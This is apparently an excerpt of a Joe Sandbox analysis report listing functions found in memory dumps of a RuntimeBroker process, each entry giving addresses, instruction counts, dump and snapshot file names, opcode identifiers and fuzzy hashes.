Instruction Fuzzy Hash: 0C213174E1D92D8FDBA4EBA888616FCB7B5FF5D300F911139D04DE32A6CE2469418B80

Function 00007FFD9B8C1C10 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc3645cf6ef700f24d96fc03731b01720d85448d55c856d7fc173c89d9b31e5b
Instruction ID: 2e8838fd9bed9d39093f4d32aa4a3181e1b4e1708a5fe7496398db3e1ea0bbb3
Opcode Fuzzy Hash: fc3645cf6ef700f24d96fc03731b01720d85448d55c856d7fc173c89d9b31e5b
Instruction Fuzzy Hash: 5821D07094E2CA4FD717AB7088B55F57FB0EF0B214B0A00EBE099CB0A3DA2D6556C312

Function 00007FFD9B8B33D1 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dbf810eb15f374ae4901267e949be0288d79fde8882074215cf8a03d5baf1c3
Instruction ID: 64d61f8c704d59578d5f32f236ab42ea17ab64e2640780a1ab470e801c63c915
Opcode Fuzzy Hash: 9dbf810eb15f374ae4901267e949be0288d79fde8882074215cf8a03d5baf1c3
Instruction Fuzzy Hash: AA213D31A0A95E8FEB69EBB488686BE77A0FF18304F01057AD41DC71A1DF35A640DB80

Function 00007FFD9B8B3330 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c4db1e6fa7cd02756e4c24852dd4d49d1e2e859640de238d1335760e9b53554
Instruction ID: da03c230497cdb141679702ce8ad4f9383c175eec21497e697ad10f04b847ab9
Opcode Fuzzy Hash: 0c4db1e6fa7cd02756e4c24852dd4d49d1e2e859640de238d1335760e9b53554
Instruction Fuzzy Hash: DA21803054E79A8FD7539BB488685A97FF0FF4B310B0605E7D045CB0B2DA289546CB51

Function 00007FFD9B8B3213 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c14140fefbaaf7a9d37a66b489b5809213a234bdd7b4e864532576e1674b198
Instruction ID: ed43f547dbf4c28d267f590603fb9b12d1f676a84eb36040d9d1143695913407
Opcode Fuzzy Hash: 7c14140fefbaaf7a9d37a66b489b5809213a234bdd7b4e864532576e1674b198
Instruction Fuzzy Hash: 8221C670E0952E8FEB64EBA8C464AEC7BF1FF58301F15417AD009E72A5DA386945CF50

Function 00007FFD9B8C75B9 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ecb8e516fd425bd3c33d9abedc1d9952a24fa795aad10201989a532d0e04a1
Instruction ID: b097f7eca246c64eaf8a2ded151e265ccfde8eb6c39f2bdf736950df0f5e8b76
Opcode Fuzzy Hash: 68ecb8e516fd425bd3c33d9abedc1d9952a24fa795aad10201989a532d0e04a1
Instruction Fuzzy Hash: F6218E74A4A64E8FDB69AF64C8656FD3BA0FF19304F0104BBD42DC21E6DE39AA50C701

Function 00007FFD9B8B0A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38fd7f41d5be71dbdfa2eddf22c9210405e81bdc23e8c80898e9c2585fe079e
Instruction ID: 1c44c4706ca2c4ccd778fdf88e508dd7b82172a24c6d759f112c58fad9cd0413
Opcode Fuzzy Hash: e38fd7f41d5be71dbdfa2eddf22c9210405e81bdc23e8c80898e9c2585fe079e
Instruction Fuzzy Hash: 5A11BF30E2A51E4FE7A0EBB888695FD77E0FF58740F4159B6D418C70A6EE34A6408B80

Function 00007FFD9B8C6795 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3642ed69ce60ba6c55dffb6e59e1983dffb167fbf0bdf4849f3ad6df35d022
Instruction ID: d98fdd29d223221276b1d6775015b84cbe1e9a65a789dfe31109b3baa8d2291d
Opcode Fuzzy Hash: 4e3642ed69ce60ba6c55dffb6e59e1983dffb167fbf0bdf4849f3ad6df35d022
Instruction Fuzzy Hash: 8411B4B0A0964E8FEB98EF6884656BD7BA1FF68300F110A7FD41DC31A6DE34A541C741

Function 00007FFD9B8C7005 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7be0d6592f451f24483b4783ba652fa20f1641aac7b0ce297dd345f5efd52b6e
Instruction ID: 915556f0613a56c013d307ac9dd75a6976fc9baa40bd4d00c20c4577e360d6b4
Opcode Fuzzy Hash: 7be0d6592f451f24483b4783ba652fa20f1641aac7b0ce297dd345f5efd52b6e
Instruction Fuzzy Hash: 261193B4A1A64E8BE7A1BB7484696F977E0FF1C304F0145B3D41CC70A6EE28A6548701

Function 00007FFD9B8C2B99 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3300fe6a9c311a4d3c5c1932e7bda3f4d2376634dc4359f5df61486be0783bfc
Instruction ID: e8d423d59c05d8407930698189e75e0a11a445bf4c699928ccbca67b44707afb
Opcode Fuzzy Hash: 3300fe6a9c311a4d3c5c1932e7bda3f4d2376634dc4359f5df61486be0783bfc
Instruction Fuzzy Hash: 3321963090E68A4FE752EBB488696F57FF0EF1A310B0505F7D458C70A2DA285554C751

Function 00007FFD9B8C66F1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 128955c44c708620b82565de286bb70e20efd3aeb883492d41dc4f24af462b76
Instruction ID: d295293d4dab7ca87d7d95754bd9a701bee2f89eafa8f3885a619f8156a4d15d
Opcode Fuzzy Hash: 128955c44c708620b82565de286bb70e20efd3aeb883492d41dc4f24af462b76
Instruction Fuzzy Hash: 2F11A5B0A0964E8FDB59EF6484691B97BF0FF68301F1105BFD41DC71A5DA35A540C741

Function 00007FFD9B8C4105 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad5de1bc448a293f74fc3410801a00b672032328062da18c95991b487dca00d4
Instruction ID: de4d257d34afab01d74a9bf2a353e95f95c356fe53d5c01de0943f657f98715f
Opcode Fuzzy Hash: ad5de1bc448a293f74fc3410801a00b672032328062da18c95991b487dca00d4
Instruction Fuzzy Hash: D211D670A0964E9FDB99EF68C4662B97BE0FF68301F1605BFD41DC71A1DA34A680C741

Function 00007FFD9B8C203C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cfaa21eb63d0a97ca5168d3ed4c937ec8fbef43e41b8ab614836f54b0ca5400
Instruction ID: ecec13ea8941845ad686e14802ce088fbda9844f26558918c2800af1842608ad
Opcode Fuzzy Hash: 6cfaa21eb63d0a97ca5168d3ed4c937ec8fbef43e41b8ab614836f54b0ca5400
Instruction Fuzzy Hash: 3521933050E38A8FD756AF7088654B87FB0FF0B304B1645EFD449C70E2DA696655C712

Function 00007FFD9B8C4625 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7506379806ae9c63baff1d3c817cd337e76d6d9c6549b17510f6fad12e0ae005
Instruction ID: 64239d4ad00e2c577c7972225b11693086127b23d33d8588e450726f5a7d126f
Opcode Fuzzy Hash: 7506379806ae9c63baff1d3c817cd337e76d6d9c6549b17510f6fad12e0ae005
Instruction Fuzzy Hash: 421126B0A0EA8D4BFB69EBA4C8756B83BA0FF19300F0901BFD01DC61E6DA656580C601

Function 00007FFD9B8C1E21 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42d34ca9a7f9c109029a3173234866564a8d6483b74bca720f5551c68188e7eb
Instruction ID: f37fd7ff9c5f8403205c07abf6972ea74697038c658682808836ffa29b908a5d
Opcode Fuzzy Hash: 42d34ca9a7f9c109029a3173234866564a8d6483b74bca720f5551c68188e7eb
Instruction Fuzzy Hash: 04117970A1A64D8FDB58EF68C4A55F93BE1FF5D304F4201AEE84AC32A1CB34A550CB81

Function 00007FFD9B8C6835 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529e8fb9daec5f380b5ea8d952b23164a34ee3f690a20d1cabd5e72c8b5f150a
Instruction ID: 68eacb2dfe21cb7ac93f189b76ebcbdc9e93aaea1b30bf2a93208b36f5e3913f
Opcode Fuzzy Hash: 529e8fb9daec5f380b5ea8d952b23164a34ee3f690a20d1cabd5e72c8b5f150a
Instruction Fuzzy Hash: FB11E2B1A0EA8D4FEB69EF6488B51B83BA0FF68300F0601BFD45DC75A2DE256544C701

Function 00007FFD9B8C4999 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9370ec102a4ecb5ae75459e6d2be78082d0a34186fcad34cc2df3cfdec3b9f69
Instruction ID: e25ab4d73484d49ec17a127756a138b80d5a81737bf16173128f5da59d6c14c7
Opcode Fuzzy Hash: 9370ec102a4ecb5ae75459e6d2be78082d0a34186fcad34cc2df3cfdec3b9f69
Instruction Fuzzy Hash: 8B118E70A0A68E4FEB59EB6488AA6B97BF0FF19300F0505BFD41DC61B2DE3565848741

Function 00007FFD9B8C4069 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660b0ec9fda5fb98c8abb689eec567ef2abcbad605b7b093af2111c5505870fe
Instruction ID: baa3bac9f0806e45e7978809935331c19cba2947b3476bb246062ac5ac558726
Opcode Fuzzy Hash: 660b0ec9fda5fb98c8abb689eec567ef2abcbad605b7b093af2111c5505870fe
Instruction Fuzzy Hash: 7121C37090A64E8FEBD9EF6484652B97BE0FF29300F1501BFD419C71A2CA356584C741

Function 00007FFD9B8C68CD Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7893de2694104428e5940793b73e6ed5559c9c8c173ae6d97b8065dc5075c4bc
Instruction ID: df50935141d670b0d40cc9c3a9069cfc639747b72ad979ad5ffa1e9db8bb926a
Opcode Fuzzy Hash: 7893de2694104428e5940793b73e6ed5559c9c8c173ae6d97b8065dc5075c4bc
Instruction Fuzzy Hash: 1811C4B0A0A54E4FEB58EF6484656B97BA0FF68300F1101BFD41DC31A2DE35A6458741

Function 00007FFD9B8C474D Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f82fcea526e4cad47da81a29830b383b50eeb72873196e1f48678ee646164f7
Instruction ID: 63f019eff4d8b69175503bc93c4bbf9ba29594d0eae4ecd77a6449368c727937
Opcode Fuzzy Hash: 8f82fcea526e4cad47da81a29830b383b50eeb72873196e1f48678ee646164f7
Instruction Fuzzy Hash: 77119DB0A0A64E8FEB59EF6488696B97BE0FF29300F1505BFD419C75A6DE34A5808701

Function 00007FFD9B8B34C1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53eef59d958b00abde51457aace4a2fc135c817672e83ca4420cb2528d55f240
Instruction ID: 28ce3cfd365e14d8d7ef073bce3d523cb686cd2b5cd20c9f60859840096522f2
Opcode Fuzzy Hash: 53eef59d958b00abde51457aace4a2fc135c817672e83ca4420cb2528d55f240
Instruction Fuzzy Hash: 83113070A0965E8FDB55EF74C8699BD7BE0FF18300F0105BED419D61A2DA35A5408B40

Function 00007FFD9B8BC240 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dedcda4325b87338b92cc9244da598f22252f8bfc5071c96e094ca603fe73fec
Instruction ID: 50838e3ed1caf7a7e29e458c49c6a4351af2ee25d6ed75868f84bf975fc3fc17
Opcode Fuzzy Hash: dedcda4325b87338b92cc9244da598f22252f8bfc5071c96e094ca603fe73fec
Instruction Fuzzy Hash: 1F11823090965E4FDB56EBB8886D5F97BF0FF19304F0204BBD419C70A2DA346654CB50

Function 00007FFD9B8B11AD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f63b2998cbc12c68409ebb1b4392cfa1e7e31a4f73809c2d23eff8e46dec3d
Instruction ID: 62d7749ba962ba2d1db5f0469346717c1c5b0682d207fe80f9fef91c555b10b7
Opcode Fuzzy Hash: 42f63b2998cbc12c68409ebb1b4392cfa1e7e31a4f73809c2d23eff8e46dec3d
Instruction Fuzzy Hash: 0711B231E1A65E4EEB69EBB4C4696B97BE0EF5A300F0115BED01ACA1E1DA255640CB40

Function 00007FFD9B8C2221 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45850523419e3685309aa6cd8a3784b18b32ffbfb5be95281351a8fccaff0efb
Instruction ID: b7f1cdb3e4e2a7c333f4e68e4e51e18bf25c49c5cf1645386748f8bccaf368f8
Opcode Fuzzy Hash: 45850523419e3685309aa6cd8a3784b18b32ffbfb5be95281351a8fccaff0efb
Instruction Fuzzy Hash: 5A118E71A0D55F8EE792FFB4885C5F9BBE4FF1A301F0104B6D418C60A6DA3492448B41

Function 00007FFD9B8B21E5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7e7d946e2e9da50289b579903a5aebee7dd122c61c269e29cd507aadedf78a
Instruction ID: 9197795ed6774ef6409f59ec999f14381e192e16093cd75040c519a8220fe68d
Opcode Fuzzy Hash: 4c7e7d946e2e9da50289b579903a5aebee7dd122c61c269e29cd507aadedf78a
Instruction Fuzzy Hash: 4701B930A4E55E8FE761EFB4D4555A97BE0EF0A300F0245B6D418C70B6DE35E584CB81

Function 00007FFD9B8C5A39 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7a8e78787d4835e4021be0f1d81bae073419de9254907c2f5d2adf44654b25
Instruction ID: 244e3af690e3a5d853859038023626338c40d76fb8ce7d12a73118a1201be294
Opcode Fuzzy Hash: 0d7a8e78787d4835e4021be0f1d81bae073419de9254907c2f5d2adf44654b25
Instruction Fuzzy Hash: DA114270A0A68E4FEB51ABA488AA5F97BE0FF19300F0545B7D41CC70A6DA34A5448751

Function 00007FFD9B8B2E51 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad9c73515249b2df9b153ac638b9d2fa177dc9f4f44415134793b1c3ca4fab7
Instruction ID: 1656a9e72efe5afd44f688f1ff992e23245ce21976ba183f1d494607457198ae
Opcode Fuzzy Hash: fad9c73515249b2df9b153ac638b9d2fa177dc9f4f44415134793b1c3ca4fab7
Instruction Fuzzy Hash: 65017530A1E65E8FE761AFB584995A97BE0FF19300F0245B6D408C61A7EA34E5448B41

Function 00007FFD9B8C490D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9cb257e792f2a7c8b142d70a920e98d0783a963302d7e879d35a25924b4e7ec
Instruction ID: 39f6c6b61a8f7d3e2fb9fb8301bc658fa39b59f4bd1307bed859caf56b4eb945
Opcode Fuzzy Hash: f9cb257e792f2a7c8b142d70a920e98d0783a963302d7e879d35a25924b4e7ec
Instruction Fuzzy Hash: 0B110170A0954E4FEB58EB6488A96BD7BE0FF18304F0505BFD42DC20B2DE356284CB01

Function 00007FFD9B8BCF1D Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93d8397553c74d492ac5ce6fbd55e267a45aaa03529fe57834921d3ae964b421
Instruction ID: 7437b1c401066cdca49caa052b8bf4ef1f2846cb8effd4b8087bb525aa0bb40f
Opcode Fuzzy Hash: 93d8397553c74d492ac5ce6fbd55e267a45aaa03529fe57834921d3ae964b421
Instruction Fuzzy Hash: 0311AD30A19A4E8FDB59EFB4C4682BA7BE0FF19304F0204BAD41DC22A1DB34A650CB40

Function 00007FFD9B8B05D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec994b16fc7b5627116464db20256fc4040e138052a0d7163e40854716498a2
Instruction ID: 391ced35a8c5505115edc7aaa6acfb9b763b4cbd6d49c5430b235393f0f417c3
Opcode Fuzzy Hash: 6ec994b16fc7b5627116464db20256fc4040e138052a0d7163e40854716498a2
Instruction Fuzzy Hash: D3019E30A1A51E8FEB98EF64C0A46BA77A1FF59304F61007ED40EC71A5CA36A650CB80

Function 00007FFD9B8BB56A Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bce28c4c3bba7e26a6b9020aa2cc6af4175233c2e096ba94b80ad718599ae14a
Instruction ID: 0eaa84b75f35c2537fb45efb86f1a01764226b33b61946fdade478ee239b59d0
Opcode Fuzzy Hash: bce28c4c3bba7e26a6b9020aa2cc6af4175233c2e096ba94b80ad718599ae14a
Instruction Fuzzy Hash: 44018030A0991E8EEB64EF78C4695BD77E0FF1C304F11047AD41DC21A1DE30A2408B41

Function 00007FFD9B8B282D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc0ae62b06ed56bfbac95990bc367bc2f481c98668def94bf6f7246cf480c7e7
Instruction ID: 069f90b638f8a25a0a5e7243ae2186db6d1ea9483d93b3fd5b08c5aa86e9f05f
Opcode Fuzzy Hash: fc0ae62b06ed56bfbac95990bc367bc2f481c98668def94bf6f7246cf480c7e7
Instruction Fuzzy Hash: AC018430E5A55E8FE761EFB494595E97BE0FF1D300F0245B6D418C70A6EE38E2408B80

Function 00007FFD9B8C762D Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76364e04cd3bea07a3eddd1c47bab04d3cb7897c075e31b5fc0ece336e8a4bc
Instruction ID: 0bf7557711a0cec780cc591412ba1ff5304c20d8652446e8a720b26b6d31a282
Opcode Fuzzy Hash: e76364e04cd3bea07a3eddd1c47bab04d3cb7897c075e31b5fc0ece336e8a4bc
Instruction Fuzzy Hash: 17019E70A4A64E8FDB59EF68C8699BD3BA1FF19304F4204BED01AC61E2DA35A650C741

Function 00007FFD9B8C6F99 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4818a1ab262817bb27cffb509c6bcee7ec73f0b9d949f29c8378738cebd88081
Instruction ID: 6f1a4e25c5cdcea78c04f927f798a0ede657c428ac80d7cc586a559344424a2f
Opcode Fuzzy Hash: 4818a1ab262817bb27cffb509c6bcee7ec73f0b9d949f29c8378738cebd88081
Instruction Fuzzy Hash: ED015EB0A5E68E4FE762BB7888695B93BE0EF19300F0645B7D418CB0A6DA28E5548701

Function 00007FFD9B8BA409 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f86ff32c5d02b007b1aba9761028047c326a07f73b81e2dccdeff2504067d7c
Instruction ID: 4b3f031682cf934cf123b2aa5a6f298adb6f915ce9f2fbe782ff2525792c08ac
Opcode Fuzzy Hash: 7f86ff32c5d02b007b1aba9761028047c326a07f73b81e2dccdeff2504067d7c
Instruction Fuzzy Hash: 16017130A4E69E5FE766AB74886D5A97BE0EF4A300F0604F7D408C70A6DE38A5448B41

Function 00007FFD9B8B2EC9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2363762012.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d002d4ebae83db68c213b77711ed86279527a2387f54e9699f9a76ea6b9e94c
Instruction ID: 0a771135f8b259967f7e62f77e69041566d7d3beb1d721044e357ce45ab51790
